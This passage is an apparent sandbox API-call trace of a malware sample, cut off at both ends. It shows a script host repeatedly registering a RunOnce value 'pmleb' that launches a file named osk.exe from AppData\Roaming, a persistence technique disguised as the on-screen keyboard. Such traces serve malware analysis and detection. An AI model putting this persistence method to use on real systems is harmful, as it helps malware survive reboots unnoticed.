puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.290] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2 [0077.290] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.290] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.290] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.291] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.291] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.291] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.291] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.291] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.291] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.291] RegCloseKey (hKey=0x280) returned 0x0 [0077.291] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.292] GetCurrentThreadId () returned 0x544 [0077.292] GetCurrentThreadId () returned 0x544 [0077.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.292] SetTimer (hWnd=0x20280, nIDEvent=0x2002, uElapse=0xa, lpTimerFunc=0x0) returned 0x2002 [0077.292] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.304] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.304] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.304] KillTimer (hWnd=0x20280, uIDEvent=0x2002) returned 1 [0077.304] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.304] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.304] IUnknown:Release (This=0x787518) returned 0x1 [0077.305] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.305] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.305] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.305] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.305] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.305] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0077.306] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.306] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4 [0077.306] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.307] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3 [0077.307] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.307] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.307] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.307] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.307] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.307] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.307] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.307] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.308] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.308] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.308] RegCloseKey (hKey=0x280) returned 0x0 [0077.308] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.308] GetCurrentThreadId () returned 0x544 [0077.308] GetCurrentThreadId () returned 0x544 [0077.308] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.309] SetTimer (hWnd=0x20280, nIDEvent=0x2003, uElapse=0xa, lpTimerFunc=0x0) returned 0x2003 [0077.309] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.319] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.319] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.319] KillTimer (hWnd=0x20280, uIDEvent=0x2003) returned 1 [0077.319] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.320] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.320] IUnknown:Release (This=0x787518) returned 0x1 [0077.320] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.320] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.320] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.320] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.321] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0077.321] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.321] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5 [0077.321] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.321] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0077.322] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.322] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.322] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.322] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.322] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.322] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.322] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.322] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.322] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.323] RegCloseKey (hKey=0x280) returned 0x0 [0077.323] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.323] GetCurrentThreadId () returned 0x544 [0077.323] GetCurrentThreadId () returned 0x544 [0077.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.323] SetTimer (hWnd=0x20280, nIDEvent=0x2004, uElapse=0xa, lpTimerFunc=0x0) returned 0x2004 [0077.323] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.335] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.335] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.335] KillTimer (hWnd=0x20280, uIDEvent=0x2004) returned 1 [0077.335] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.335] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.335] IUnknown:Release (This=0x787518) returned 0x1 [0077.335] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.336] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.336] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.413] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.413] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0077.413] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 